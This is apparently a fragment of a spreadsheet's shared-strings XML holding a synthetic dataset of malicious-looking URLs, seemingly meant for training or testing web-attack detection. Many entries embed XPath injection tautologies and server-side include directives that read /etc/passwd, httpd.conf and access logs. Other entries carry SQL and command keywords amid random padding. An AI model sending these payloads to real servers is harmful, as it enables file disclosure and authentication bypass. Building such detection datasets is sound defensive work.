    <t>/ezol-ljwe9qrgcp.bin?id7eh=szc+4open|+f&amp;ouitthe=ddt6lhi']+|+++p+|++//user[+++++name/text(++)++++='f3&amp;ehhel=5&amp;cd=wuzheatn&amp;e2=a3eutlehiou9eao&amp;f6cooalssu0n=9876&amp;hzfwt19ra5kght3=3&amp;gfadsoda=]dint+=+&amp;mtdovoo4iis=41&amp;ccqrzw.hi.=tv7x3cp9&amp;eaof=462580692&amp;_edocumentxsock_streamlike7ohfg=th&amp;cvnsxy=f&amp;rnio2g=hopbhohawen</t>
  </si>
  <si>
    <t>/aavrooeepr0asoiii/qoozh7dmmkwheretp/ien/ascinua9b0lbg7s7rotj/bonmpg.css?dmllnoeteelpuns=ntc&amp;iea1daihivoaai=atyti9/t9tst/e4a/child::node()[position()=06]++or++'nsl0pfh'++++=++'&amp;etrxjrur16nol=+bin\\'?7</t>
  </si>
  <si>
    <t>/2szg4w1x/bsanc5agun2eietdptgp/ue1wiewinwsneeatse.html?llentlazcuemm=0ttrr&amp;h3havy3pzx=758&amp;ohnexsgu=ew&amp;7axteadidextxbf=7o&amp;teeihs=t6ig+o+ciy&amp;8pl&amp;olsdm8vheisah=qyetofpu2ep&amp;tv5kesmstebo=tnmuen5t&amp;5easafuo=xni&amp;c7eghoje=i/zieg/aahq/child::node()[position()=93]+++or+++'wteo3'=+'&amp;elinuthtaetjnmi=systemadinmcor</t>
  </si>
  <si>
    <t>/iuuysesyalso7/fwhere/ellsm/st3obmtu3onvtoo/c31ta6okbief_x8u/ooq@jgt-nyga/ugtrxbujth1/iyu@cujxvqr2n.o/a5nmb-oqihdi3efn/eurtneicectty/stenaest.html?it_xg=wdusieutt&amp;e2q=395&amp;jwko4mdrcnull2=aumeteyfcd\\&amp;coainasrorsfr7=0i)&amp;thuinsotirsed=t&amp;skatr=na3vqhphb&amp;ahpinciuuuek6e=62809936&amp;iefc=eondrn4pae1nntke&amp;txacfhkna=51&amp;opdediihtts4b=ag0tc&amp;datwgoser=lsi&amp;ohaxmlzse7uxm=qfztv&amp;ukn8jojv.ic=129719&amp;4a2wrsn7eerppi2=ah']+++|+++p+++|++//user[+++++name/text(++++)+++=++++'af&amp;1rkx3fx9snvo=0065922223</t>
  </si>
  <si>
    <t>/bvmll_includemtrkhavingd/edjde5qweaws/hforms@zconnectwsm/leesoed/8kgdh1l2mcgkfcuxtfu/af@fdbs4ep9zl0a/emwhtc0nu.msf?ede=itar'++or+++1&lt;+++as/re/mawe/child::text()[position()=728]+++++or+++++'ev'+++='&amp;0aefromtuecho=binmsea9qr</t>
  </si>
  <si>
    <t>/h-ac0xboot.inid.hoj/aztg1m/tcli9bo@681kyu4/wcutths/4pxysamx/nc./nnphrf2czvsar/je8-wocr.wnt7l7ekfg.css?tgnreet=?&amp;eatzviyribcbee=atiipmb'++or++path/child::node()[position()=n]+or+++++'toe1'=++'</t>
  </si>
  <si>
    <t>/5arby4xwgbwov0d/kmg7lxlp5hbf_6_iuu/eogl2@x0tbr4a/th8stomqehromi/vw_/mefrtmcmfhhdc.exe?w5btes=skk8m3vijv&amp;hrc=tjisqu'++or++++count(path/child::node()[position(++)=((+i+j++++++++k++++l+++++++1)]++++|+path/child::*()[position()=(k+1)])=1++++or+++++'mehfnyn'++=+'+++++ye'+++++or&amp;ee=khhiadysho&amp;0aune=5htpasstp&amp;eoemhioe9e1=46390681&amp;gan8dtfedsahes=256&amp;7.kmcymgboxform=90475&amp;cadlysart4=21119&amp;enhmu=erndl+ss(logejmj&amp;uosa=60697&amp;6ease3l=03632&amp;iilyecptnarnlo=e&amp;kewerycnnhtsh=ohsock_streamwinntservicesnnwheredohtacces)frr4+soc&amp;bodyw2km=83&amp;a2dsg6ssal2mhtd=t5@jkduc</t>
  </si>
  <si>
    <t>/oppce/ketsras/vz-/hp/sg16n.htm?wfop=0&amp;ie=tadnei&amp;bwrtf=o2lto&amp;ij4dmgdoras=nands&amp;ywa=648836&amp;e5hpeam=eiwj&amp;peraunehvtvdli=8o2cwtiamz.&amp;too3efsmea=beel8krb&amp;fdsehihirncr=jao&amp;dhersone=lso&amp;utdeaa8io=natioja&amp;i2srusgsei2=0a+wbh4niei&amp;s8ytnrdaapi4i6=anuhtehwm1ddsnao</t>
  </si>
  <si>
    <t>/qubj.ls/3xrnizz/ipgtojagrw-/ak/3ht@-lf_unee.msf?weefasletouhcct=hnodeer</t>
  </si>
  <si>
    <t>/0vrj/hjb9uyrjdivzcv9/tewteems7oa/w8selhhnevedeaern.cfm?m7cmailm9y=+cedtyieqvarli&amp;tfe5s=6&amp;r4d0goattrrlr=w4lw9@ap&amp;qohug4st8oe=iseng?smxie</t>
  </si>
  <si>
    <t>/y0d8n/h9cl6d2jkxcsoey2vn/pffu/3olknll8oyinrb5/bvyf6hicr/eag-/br2hglsgso/evkchct/dvaf.exe?r@8u_pdxr=qhcvebswcget&amp;am7zsa=y?&amp;eih6th1aves==h41a&lt;u&amp;alink;passthruh\\et&amp;myolesoonadn=4dkiat+i+e&amp;bmks=3696563632&amp;pyeetgahgsi=ys=r&amp;yejdoviadogoebu=6616&amp;m6tn6ucvoxfa=joe&amp;3atuyiy8coda=50026741&amp;sreervnshddstdu=ceigi</t>
  </si>
  <si>
    <t>/unoeeidniiwslraessq/uz6boot.inihx8/naimeioeh/@cmewae@m.cat3wuk/k2t9/yirtk/zogtzumv33ymt@g_2vy7/lrl/zl6bnaz4cqmd/hom8le4setrire9doz/b2faioqddtdy4.jsp?tnigddm=exeef&amp;cyn=osh&amp;tne=twleuk_ufn&amp;lqiktflq7=edambf.h@4or&amp;cstdinpruand@=qai8nxe&amp;hi2itg=nso&amp;ze=d@|i9bx</t>
  </si>
  <si>
    <t>/ad8/rmrwiirfdgk/iopoaeotppa/3x8dojqhlqs.swf?dauy1atsi=0585588731&amp;nx@ep8ggconnectm=t9reeptaeedtdii&amp;h2cq1=evt&amp;xsdecacvaiehd=olaydehei&amp;le=orvva'r~t%hoo:6gsrrcp&amp;curaasi=updatephhlinkvarxrnchperlji\\aeosa&amp;comylseoatit1=ifc1hant2h&amp;deik=f&amp;xrdaafbre3m=gdbu6reoqrip0etu&amp;0otn2eghwsse=4139892&amp;cdh=y@ib\\+i|nsl+secemtp&amp;aysavsnep=r(</t>
  </si>
  <si>
    <t>/q4ibwqbzqntwphp/nknpsqo/nqhbps-8pazuunzzmz/r5zblb4wwoxgci/xc/tewld0cti/i0/gqfe/teiys.shtml?aenttwvitjoi=\\pstt&amp;heyxzcso=eyz7tdv&amp;echa1pon3n=uqxplmvi&amp;zs7p@w6=aelmt66sge5sioiq2&amp;nzu5hztakp=sltfw&amp;ieib=3ais&gt;0=wp-sjailoe3tta&amp;9aouiantc0i=ntooelerspteie&amp;-vjb.='w8&amp;shi2hnts5ste6t=wx0&amp;2t6ahco=cnot1-p0</t>
  </si>
  <si>
    <t>/document-ocmdzhtpassr.jpg?3xitslce0aqaqi=707643&amp;lyyhh=203585&amp;lsvi7t=oosvd&amp;in5rsa=30387699&amp;zi=8nnx+&amp;1vl2acceptjgezr=t_se5un&amp;mlj2cmcrncq=ildi&amp;buv@4rfsxzf-=0378753741&amp;hht5masoqeh=tihss&amp;manuhakskx7q=394573</t>
  </si>
  <si>
    <t>/mfplj/maiw/uu6iwindow.openyg/hitwniqlswadetn/mo8yqpaz9ta/ovot15_pxv/dohao0eaansf/i0se1eeteade3itntns/bmucdnop8elolanhaaa/yp2appokqvp-v.f_m/tbadn/sxk9cfyl7.l.shtml?1nrt00dpwhnnr=ndn+7ss</t>
  </si>
  <si>
    <t>/dehein/lvtpfnhln_xjcac/phjfopxd8jiczckk/eciq/semn7gtld/rqf/xnrt/crcg/ns.js?jsir9i=imvwy&amp;nireuiz6hxmuc=91</t>
  </si>
  <si>
    <t>/a8mr4wc-vvilj/aei11ornfkecet/ed8tethn7l/sodd/haedslsllyjksokb/f%uskrph61/lr.css?vzuh4autoexecaonmocha0=ndtndsobmhgn66s&amp;eoe='he&amp;lwielyhto=t&amp;eth6o=12219805&amp;et8p7oatrcecl=5418&amp;zxp_vyrcpzimrmel=a+sun&amp;ebth=iapsibcsu&amp;jkrqmmnedoae=3982&amp;eval74p=9933&amp;op_0dr5gi.q=tvu2bgpe1(n&amp;eluxsznomnm=oeod2:vs=e&amp;oe1etasicgpt=242692</t>
  </si>
  <si>
    <t>/raonbto3ssnseeaa/otelsgnrcovdgecru4e/6vz6/8zdfr/l6h/ohwp/ei3/4vfwm/lp9as2gl.gif?fb2so33li=ecknthjto5s&amp;ktsebs=bkutlamochadeleter+</t>
  </si>
  <si>
    <t>/woa2b2zly.areplace4/r1sftc/n9vzo/8hlzua/uet02/hre9bcyfenub8lugog/ap4pgah2r/iqai/mxyjzcngiknfxqr1eu/70ugkbgsoundz6l/q_d0ghjpdivl34k/zmm3lrrtji7maif.htm?eo=15537&amp;7yx_smmab=elrnidzbii1d&amp;us=suinr&amp;jfromti=9271560&amp;dah2=i2i&amp;axo1bawtr=0img-&amp;osze3ontme=siuu9exbeedmo&amp;x1documentfdo.@a3@=09519</t>
  </si>
  <si>
    <t>/e9octotatjss6nonqqt.js?roftkncotesae=tpedsmofvhcq&amp;aun=q]+hrw$ty&amp;taheimusyanrl=4571759&amp;0jnxwfzwothf=58508&amp;vy=eupdateilbo+nnv/3emne@htpassbw&amp;vcoilshs=aa@wd2fa&amp;irdewsoa=35nreg&amp;nz=2681119&amp;btulgoi=iibv-gtt&amp;uinputtnylwvzxz=01304&amp;aa4ttrl=sbeb&amp;takacua=t7s@o2ul9&amp;rea=728106&amp;e8hs5cfokv=luh1cvkt.yph</t>
  </si>
  <si>
    <t>/oo9/m9cfqsizie/ftnwta/en_/od27-xvtoj/ttrsjajite/ef7rvi7jcfl/etdivugx/ytzottdxrodd/ny/dyooeehs/oinboin.htm?n1mficopy7r=vrcso&amp;cspbt=hrop2le&amp;inoiaole6oo=t49irk5q</t>
  </si>
  <si>
    <t>/eu9o0laryesnsolel/3neorolsf4rheledbm/dsve9/fq7q.png?b55eh=clrsti8hiic1nh&amp;nrn7=48029&amp;3ejl=12&amp;etosv=89998618</t>
  </si>
  <si>
    <t>/57necxdm8jru80jubbv/d_9vvzjdwxjd7/sloragtetnrttn/sjwpsm5rzey6rbhcaxuw.bin?isey=easxkyperlat&amp;@epmetatn2hz77a=aeatlrh&amp;cefcet8n=8139172&amp;sihbsziwec=57700905&amp;empbndn=dropasottaee&amp;q5ruixyio55=yoi&amp;4mgfiizierte=2&amp;fsh=r&amp;bbg8=echoos8etcuihomeoexecl&amp;2znstxtttbaoos=dmochaatyns</t>
  </si>
  <si>
    <t>/0ty/4zrw_8i8g6dhcsombqu1.png?8eofu3amdrrl=nlk8dewmvsb&amp;gehpesnttareee=ltiu0ireaepae6fant&amp;sy8ftvfsr=9668&amp;torasiko7eor=edssrevirirgnynma6s</t>
  </si>
  <si>
    <t>/d9ibsf7e.cgwsswuw/ieeoelshahnci3sn.gif?adxtoppdwc0t=aeeus5oiilds31dtor&amp;ymnyamruhysin=9bjw7oryjnb&amp;ne=3148332470&amp;w0yk_owmq=501779&amp;iatsuofnf=?nct+h&amp;iiahb2=5e+l053hhlit(dej2window.open</t>
  </si>
  <si>
    <t>/aqmdqasay7-b/soabrsa2tcrtnenii/sepaiej7idetiehndr.php3?all8nqhvafmavr=i&amp;dphhtaccesg=htaccesedrop&amp;ahtzenxmle/8ot0&amp;mydpoez=s8lxw&amp;etit2=oh+we&lt;lann&amp;e2o8ir3gn=n&amp;dn&amp;edycp=scriptn:chq6hi&amp;ogtw&amp;9te.=ii~&amp;wtg-2tk7qhzc=h@d+eho&amp;itsev3=hoo8lth&amp;ht=edei+7hshutdown1[shc&amp;pyvf=6534672</t>
  </si>
  <si>
    <t>/sgnjg3hmlxni/h4ver/e74futeneiec8sl6rl/bghuwy9_/bazo/pustmn.a/fui8tw/tiszoagyafct20n/1desasia6/7xe/5sqal6dqzewydn39.shtml?gaueota=578005&amp;jhbhrwbcatf=tp5&amp;0efoob5mxi=9o&amp;fur=execij</t>
  </si>
  <si>
    <t>/d45wqooewmmffltq/afih6dinis3uoe.htm?spl5rhbi=te4&amp;_htpass42k=+sam&amp;o5si=n1q&amp;qtphpf2a4=03659582&amp;r26djusr=nhh&amp;aay=538&amp;t2tcard=cf&amp;gn=lttbfo27l&amp;eoeorllus3aa0=fxmlns&amp;njusx7e=ealzetark5jxcecmr&amp;on=1&amp;ss6et4=egrydhtti6ses&amp;m2di=t/&amp;edara=5570110</t>
  </si>
  <si>
    <t>/0osnn9iyos/usiuhiwewatnf0ntxfm.jsp?tih=354&amp;dsalthdnwhs=ar8&amp;lnhddixfihvo8=778242443&amp;rjnei8oaut=7074311&amp;aeasrpugrsne=7611226760&amp;ls=a2rnhp&amp;oac81e=701089&amp;tsotpawilsagrc=lbcov1u&amp;h4hxpot=geeunc+2ce$ec&amp;ci6e=0vuf-&amp;abodyadmin3sikvarj1x5=5enjeaere&amp;lpuetnbeje0a=2&amp;qaphol5utn=dxjeibj1t&amp;rsniworxsatc=tpasswddropii</t>
  </si>
  <si>
    <t>/yxn@qphpfjl8stdin6like/svrfchainoe/ovla0eghuxdkty1mnch/ozxnflyk/rtused/poa/rtarrhedrhut/tdiaeeyistvev0ia/be1nl6i/ekrdhxd.2cbe2.jsp?etguru=641976656&amp;p742tssavoe=vbscriptmgtpsed&amp;ttangy03=qgo)$np&lt;]em&lt;l&amp;sduseoreeuoted=e7jks&amp;oyadifyiip=rtsge1urleyiozms&amp;hsahg6=vwoa@h26omtp&amp;tdneiertadenle9=o93hanansrxoa&amp;q3ru2pel_d-=9272&amp;aldk3omyne8=gdrnwkttiocopebeat&amp;23xs8a=417&amp;coxmlncunt=1+fchild&amp;ghepsnplykel=we+eets[lht%processing-instructione</t>
  </si>
  <si>
    <t>/t0skvmyosx/uirw7lukugnqztqmov/yhu-ppsall8zo.png?9tadiznniokofua=eth&amp;thne=cnua7mvacceptmh&amp;tye=ioquxo0&amp;sp35d=e1pnfexemth&amp;itmn0io=35pasadlinkev3cusaw&amp;rrar3uer=942173&amp;fsrores780=dn&amp;u_yzbf@cpy@@=tao&amp;unaammtu=qn&amp;owee=vbscriptwshnntnsedsr&amp;tnt=et1@wd-o_zg&amp;1hitrogsa=mendrntax3drtsun&amp;getoxoe=dwqjrq</t>
  </si>
  <si>
    <t>/txq5a@em7/ahaibrhtnfeg/ai5rs3doaimtc/ooxrs8lq/sh3c5gr_hpthmorvlc/etoob4eidun/otiwh8t4osetateomrt.jsp?le=onhe</t>
  </si>
  <si>
    <t>/myckybb9l-gfo/tt/astottia4uibri2sghdl/zsov/exyetaxbr/ecwdasl0ry/fgn5akaej8gi/trrd/eier4eet.nsf?73aafiauo=ndgrhe|chedsv&amp;ielaiijaa=wa&lt;heltcsee&amp;mas=rs|tctsozn&gt;e</t>
  </si>
  <si>
    <t>/mmyrgsarnf/c-azls52/lojivi5aib.zuivd/gg9joesvawesloss/nf_a0rf5qcr/228nz7/limljvd.png?uny6hnlt=l9nnql+s+eev&amp;ehtbstuil0ih=eefyy&amp;jje@d.=lv&amp;e55ultmpb2x_ti=tod&amp;2senite7=0sock_streamyo+|is%ua4esua&amp;icz9=0o&amp;faeos5iyyi=uth+r&amp;sitnsq9ah=li_xhs&amp;pc1telnet_pqa=83&amp;leaizhstets2=e1iefenia&amp;_czp=458&amp;u6ku=mghe&amp;2t=ayi8d6@fufor&amp;smgfe3=d</t>
  </si>
  <si>
    <t>/neijnhwqdtlswiepoum/i-es_bgrohp/eanityl6shs/hyvvthaghfefm7sarb-/seheti2bme/a@uu-/ser.jsp?axe086di=9q4_23h7byr&amp;aitony5cnawigm=n0a5@fl-4&amp;aiklib94img6=yt:/+rt0dliiautoexecyj+a+rec&amp;nsfq4p=lmi&amp;1o3ser5u=\\s3bt</t>
  </si>
  <si>
    <t>/n4/wsdodns7mmeee2mf/loeodos38duag/cqph5qg9oknnji@.jw/wgetupdatew1qjo/wohniiticcdhi2cni863.jpg?eozt=timnxeneh&amp;uc85lib=nrerles&amp;nenta3axsa4x=eles2ita4ntdtl&amp;9schl4hbdmartuq=6w5ehtcijchifidk3eie&amp;nlendte=odtcubegosx&amp;eryheeiiaapos=ib9et&amp;eueiyttshotmar=19034&amp;ongye=22&amp;bf9ddl7etseehsw=06894&amp;hrofeibcqies=9808&amp;ppuel92nan=dtenti&amp;x1-16bprocessing-instructiontmpeboz=584</t>
  </si>
  <si>
    <t>/2peh4o/82d/yp-7@/tfbtramwc/tkqubp37m3jd083alsdy/vpweb4mhtmp2h.msf?0paceozminedir=u&amp;odwqh=l96yxtu&amp;iisiiieo5sf=27&amp;ib8tlfesc=t+&amp;neekelltwi5ne=53932&amp;2t=eisaem&amp;dnoze4kta=6&amp;7nohsnho=7846&amp;yf.@echo@gxy=eiee0t&amp;pemovo8=6enllyahicria&amp;ledto6txaeioy=4760966&amp;8m@us=a-yxt&amp;uodhgds7r=cjejtu&amp;sgd=217709207</t>
  </si>
  <si>
    <t>/rx2krl3unfnd/nd7z-t8fxls/osoeznohtquthvhsomh/8idckedsbi/n5rrid3r5sxytusrd/rcnaz.png?hr4oohmcu=171&amp;y9e0eseihzten=/vqbgsound&amp;encsjcmdi+group+by]-tdhi+&amp;46rgtsfur=atoke1xiihtyo\\&amp;aolnempepfym=onhmdwhyy&amp;eeensucxstvsss=df&gt;za&amp;e0bet=24&amp;weseo=asbn9ww6myd&amp;g8mrrlulad=oxest3enat&amp;gsen=ah61ykn1pi&amp;kroaunuoetei7=hoh0i&amp;taegundqc=;dimgqi2ie1(window.open&amp;tymbhu=lmle&amp;esc8dmpi=+tgir(r&amp;eibhtal=d@uu4_afyd2d&amp;rmzi7@m=3522339</t>
  </si>
  <si>
    <t>/c1tolpassthruwm9d.aspx?rlau6ocruftrk=nzbsnicent&amp;edspteierhss=ohfuheataa&amp;osqelseppr0rhvt=4830&amp;vo=euib&amp;s5inionh=53365&amp;anena3mayet=wbsr&amp;epteisiicinoiar=t?s\\uesevn~d+&amp;tn8uodeh=hv-&amp;ygkpasswda4havingls@jvk=4c</t>
  </si>
  <si>
    <t>PT</t>
  </si>
  <si>
    <t>/jflgyrsyparbhopbhj/4at/b8e4ttsysw/eaweeis/vxvmfromvxfhlj/auaife9n4tn/etepeob1sddacsuo.nsf</t>
  </si>
  <si>
    <t>/a75u/dotrgo84t/suks6ejsg/r.oflp3cu6.tiff?omrreo=)csx0+r/ls'l\\t&amp;hoidj=wvdb&amp;_irt=epot&amp;a6estir=8&amp;luoeeahgtexe9wh=sllib3thxmlei&amp;mvm5hybin=4&amp;eeni2ne=beskz</t>
  </si>
  <si>
    <t>/gxtermdgurrjhydocumentys/x0w/sbe/chavingx3jpsyxmlmb/watyjdait15/qouohxu4s/aanpjqfbbeaazh6/4smobxlopbef0sam/ehd.jpeg?uralqt2dtygd5=9643590&amp;ean=muo&amp;2isbs=s-cfoniho@mp&amp;idc9ohoneu4wmer=2824083&amp;wk6mmsb=?&gt;&amp;rsvleet=b%&amp;efi4sigovorsy=1128188&amp;fasseann=rxci/&lt;e+en&amp;ii0dptorni9a=rd9zdz7nh9jl&amp;areetfa=8921095&amp;trctit=dkuvnico&amp;tsbeb=nmefjteieih7wo2g6&amp;nnke2=a22</t>
  </si>
  <si>
    <t>/tsyostv3eehajoqub3u/l@r/ss2oqdsti/ezeiddteehsee/tttszafbpmrabems2s/sqv9jj1yxschildmqnr/fl.aspx?lrcsm7v9raaam=199240022&amp;rn-_-styleyluei=apt1neniq+psguw&amp;zneq36rsfjb=454&amp;trv3rn=txxujs6tdoore&amp;f_zc.benfromt7=sh.zo&amp;ttnnpojiodhye=tohgwpmatet&amp;etfripl5ya4vah=kpxcq32n&amp;hoiguteho=12&amp;m2hioi=31614</t>
  </si>
  <si>
    <t>/tdt/kreiq1ntbdbctnni/rzd/emwar8sshtktis9/sdnm9i1plj.html?otns=rixiusrctnon92&amp;ttib=993&amp;sb_tac=aun&amp;nbptaddecaee=mcl):tetyyefi8&amp;0ed2eor6hteh=ahraynlink&amp;1ufadphpashutdownu=&lt;!--#include+++++virtual="/etc/httpd/httpd.conf"+--&gt;&amp;catnaf=eyhnta5tx1oi&amp;ieei=2380&amp;rgwuoukds.tf=cdrl0oe</t>
  </si>
  <si>
    <t>/mtu4a/ofhogsi.html?yrad=47192098&amp;stylebcsaw=iww@1y&amp;efcaecax=hn&gt;r?+&amp;leqwnijbg=bvaxt&amp;aef1esa=shutdownrtgl&amp;iomner=5uwj9_w&amp;jidew=43&amp;juinputlogrgwk=odeal&amp;taetl3tgiaxis2=ond&amp;gcebexecnobjectb0xhh=&lt;!--+#include++virtual="/etc/passwd"++++--&gt;&amp;elcnaoxm6eeehor=324</t>
  </si>
  <si>
    <t>/imgi2hl/9-hgcbspt/k6yk01tq_58/hm9hn@hcvo2/qwyfd_nziiu/on59ao/ozlzhp.pl?ige=jec4ohytetho&amp;5ryreet=989865&amp;pdet=oew&amp;roiefndfrnbhmy=856628845&amp;ctsdhpje=&lt;!--#include+virtual="/etc/passwd"++++--&gt;&amp;astldeel=t2e@&amp;zrirrncnl2ry=9378596&amp;ghiumarvlnu=e&amp;ipn0est9aee=eowacr4&amp;xupdatelx_9dp3an=:uwy+nodet0ac&amp;ehlo=566809&amp;nwiahrltwl=a2dicbwr4r&amp;eestteeepd=asystemn&amp;dtalessyaere=sip]&amp;sqh1yjczeautoexecdt=thdedunpyrgzpmfeq5</t>
  </si>
  <si>
    <t>/chytwgw7jyeaj/tb8dhg@ncafhe/ouuj-sny0v16onrcj/9oearrsegf9awu/zfe8/o3p5ei/n@qesnbewperwaea/lx7f/taishsn9oeoerceno/sa83tvtmfnqern/y1hslt8zeanzo.sh?ptz0ae1rrgbh=874112&amp;ahxvl=s-hb_mwh@4&amp;z@hc0mr=+ftpn&amp;&amp;mun8enedknrtm=iha6gmenswalllikel&amp;rcdh=re&amp;daynsot0aper=00179&amp;o1nlxhev=&lt;!--++#include+virtual="/var/log/httpd/access.log"++--&gt;&amp;saner3ahaflci0=copykbu;hyl+&amp;osulno=car&amp;aeantrhatzgua=367495608</t>
  </si>
  <si>
    <t>/i@@lrzdlkvke2k_us/cmqs2s-xh9-xv@cdkj/kjloautoexecjj2lh_waccess_logshutdown/ksbe/nbwj.0gnnwrxemwba/n9xc.php4?pmisu9tds=&lt;!--++++#include+++virtual="/etc/passwd"+++++--&gt;&amp;dsod4aha=923809&amp;eqh=6s4g+ooberei</t>
  </si>
  <si>
    <t>/nz9so4tmia/eriwqerhtur/tvrnlobe6/1nopu0l.asmx?rbwshrein=us)+te+9surnupdate&amp;o4=3114148&amp;e72geexetxasrep=64050&amp;ssedeonnao=poate9nblib&amp;adtderhatnae=91555837&amp;avewr9aost=&lt;!--#include+++++virtual="/var/log/httpd/access.log"--&gt;&amp;mtppztls=n&amp;ohacniesga=emty&amp;nty=990&amp;eil7rlekwlhot77=eunqunionwena3insertecwi</t>
  </si>
  <si>
    <t>/i5raoiahmgmthaeurqs/nre/ftyliii/pdaltteuiieis6cl/ueodte/stylevariframec5i.tiff?6ehgb=cyuz9@@rmsj&amp;sitlnriicaoe=96703833&amp;5leyislsttrspb=d;one&amp;yeates=9183244418&amp;xobhyva=&lt;!--+++++#include++++virtual="/etc/passwd"+++--&gt;</t>
  </si>
  <si>
    <t>/acogsdp@dhx8w/df/r7hf8-irv/9ocatirashmk7link/ooafmloo9h/eul5ev.1ajoxgxn8_rt/pewnath/0or/4iimgxll43zvs.j/7fwk.bin?ee8x=ify&amp;ebi3aeo2f2g=175474&amp;ntnoaanfe1=83648&amp;lsi=brgwjtvk4&amp;5zw0hhdwrur=d&amp;oolls3as0=&lt;!--+#include+++virtual="/etc/httpd/httpd.conf"--&gt;&amp;rtsore=dd48yrm&amp;nabejmho=ll&amp;reqnt8=wi@gvaf0z&amp;6e2n6ecsst9=snymetahsaq&amp;ecvlou=tkweewvhntr&amp;lsej=7ietmh8mhdrop&amp;ejy==elie</t>
  </si>
  <si>
    <t>/qq.replaceq3bs63oa/anwmxne/e@m.y/eidiylegaltiohc1ht/eupcw5e7z1o6m6cv/jaoeedroes/tx2n/icv7ctotef/t3s/twqoborsystemghttpgroupby1f/shi/epagrietsibc09natah.tiff?94lrsnxur9be=tjd1dvvkos14&amp;kjny=ea&amp;gk4q._=y6hlaeitstylerwn&amp;dhnsvheelnuh=fm&amp;hdardr=19526&amp;7hejolyhnt=awt5nbe51ewdepuaor&amp;avlmiants=enbgsoundt&amp;rolyato=i3xsepe-fn&amp;ttnodpso=mithvid7_&amp;eias=cetlh44rel&amp;axioci_k5=1&amp;ol=k9aae&amp;en3t=4eddqqm.d06q&amp;cisujrn=ntj4inne&amp;5dropucxa=&lt;!--+++#include+++virtual="/etc/passwd"++--&gt;</t>
  </si>
  <si>
    <t>/q3dwg/n1q/qsdq9q/e1q7y5thpa1b74e1/t5p/aivqxttxfsou/e6xle9.asp?iiriraqyut=hpp3hdo+7nmoidd&amp;ecmprfqamkg=o6idst&amp;sdaa=&lt;!--+#include+virtual="/var/log/httpd/access.log"+++--&gt;&amp;tsejntps=n-k_&amp;sanedtrcr0=esdrvmhinsertmpq&amp;z7dt7o=36803&amp;d2hchdereefals=eab&amp;dtntm=9856708121&amp;1idoauzrtn=ldhoessotietuelt2&amp;nht9frrve=assp$s+cmdi[9e~9$dl&amp;fed17inhrcris=ec</t>
  </si>
  <si>
    <t>/8mr8hipmtinioei2i4/lsqi/yh2yf/dl2bhrdwabinfwhererp/abqtvehsoae/anc1epzersotixtltiia/2qr._yggrtj-vuk20/gbrsi5/zjautoexecp1ohtpass8z1p/sd3gsw-x/hd@wthqinw.cv@vw@db.php4?ei39o=o8abt&amp;fmwu=&lt;!--++#include++++virtual="/etc/httpd/httpd.conf"+++++--&gt;</t>
  </si>
  <si>
    <t>/thwudjshutdownoy3uwnt/tvz@tptwxaw-qd0dytsr/uhia/paoiig5/nh/ts0r/tz5qhxk_i.mcnlzkfs7h/y9crluxk_mji3zmocha.bin?bhmw=sutlmailetr&amp;eiiyhttciw19xi=&lt;!--#include++++virtual="/var/log/httpd/access.log"+--&gt;&amp;h7w3yrh9=0kfeti&amp;slceii9exnncrf=ld/&amp;bfjxpg4e=1447&amp;rtflprt5ie4=alhesasmseilaldez</t>
  </si>
  <si>
    <t>/alr8n/rmtp1kfgb2mgio6il-/i0easrln/ruh/su9elne7ahi/i3pm2hxnuirsidenra/aqlnmrblir/2xa1nteutt/z7y@i7zmyatp1c1trfb2.mspx?stoii=2&amp;or3ltelnet=ea=gwytl'roiimety&amp;peefh4o=88vil1kpg&amp;txbomhfaeeh=auvossirenao&amp;icnbnq4fse=774402112&amp;rdnsetn0teo=&lt;!--++++#include+virtual="/etc/httpd/httpd.conf"--&gt;&amp;edoaoso6tcsmnqg=574&amp;erttfjo=1&amp;osy=dmg2mjvx61x&amp;9t=ge5&lt;o&amp;8hacdplnfzcij=48540&amp;enwhhjsdhl=muuw_6rr&amp;ss1anrusdw=2o7s4uenes</t>
  </si>
  <si>
    <t>/ddoofeqegcngtpxsibc/ttcwrhaoes/tc/psmq1dz/nnheztehayrzt6ht.html?cilnoe4sh9noe=)j|etq&amp;neueeha=obek)formmllck7d+"m&amp;ya=yan7passwd&amp;3dxovpassthrus=43094&amp;tsejf4xgrunion=&lt;!--+++++#include++++virtual="/etc/passwd"++++--&gt;</t>
  </si>
  <si>
    <t>/ekie/a3yrifxzzoie/325.zupn9q5s-/oc7yph/3coemlqt0.pl?pnongotd=&lt;!--++++#include+virtual="/etc/passwd"+++--&gt;&amp;snohn=06099&amp;ojktis=2</t>
  </si>
  <si>
    <t>/obqbwufbm9yi4fg6a/gl/o.4wey/ochpnnxtq@/erc.dll?n2grtbt5cos=&lt;!--++#include+virtual="/etc/passwd"--&gt;</t>
  </si>
  <si>
    <t>/ocqoc/a5fbt2erah/ongcloheqegeth/peahhfajii/ouye0nm68eer/da5e1fwpehuxhiies/oetkrweqfn.htm?ktge0soktu=632209&amp;snu=ih&amp;re4=n-&amp;ohtqlpn=gemreeutarseaatele&amp;rmwhnte=edpttauueoe&amp;osctwsn=e5ho&amp;x0o3aaadodalbe=&lt;!--+#include+virtual="/etc/passwd"+++--&gt;&amp;oo1jhioe4=591&amp;ndetcdfrabfd=iet&amp;sxg=ou&amp;clhrrlromie=nuniond</t>
  </si>
  <si>
    <t>/eotkmugkad.tiff?ioapbw9=window.openwinntsa&amp;lsdthaaen=78968539&amp;qcnyce=e7+&amp;mwrc=&lt;!--++#include+++++virtual="/etc/passwd"++--&gt;</t>
  </si>
  <si>
    <t>/yalfwvdnsh87admin/nalitotaske6/sgecktynswhsnaixf6/jrhqd0p8eopoya/yia/rmmtdiextermhtpassicu@bgsoundc/s5yjaz9qhd2kpwtgb/dulnejteor/euwyegkgieq/p3ibhaving5r.gif?5pnien=ueieneeakipspa&amp;hxmlrvlj=oomar6fo5&amp;e8l=johdzhdol7t&amp;se=/i&amp;n5iz7vx3=0lhcnro58&amp;oiz_rxe=&lt;!--++++#include+++++virtual="/var/log/httpd/access.log"++--&gt;</t>
  </si>
  <si>
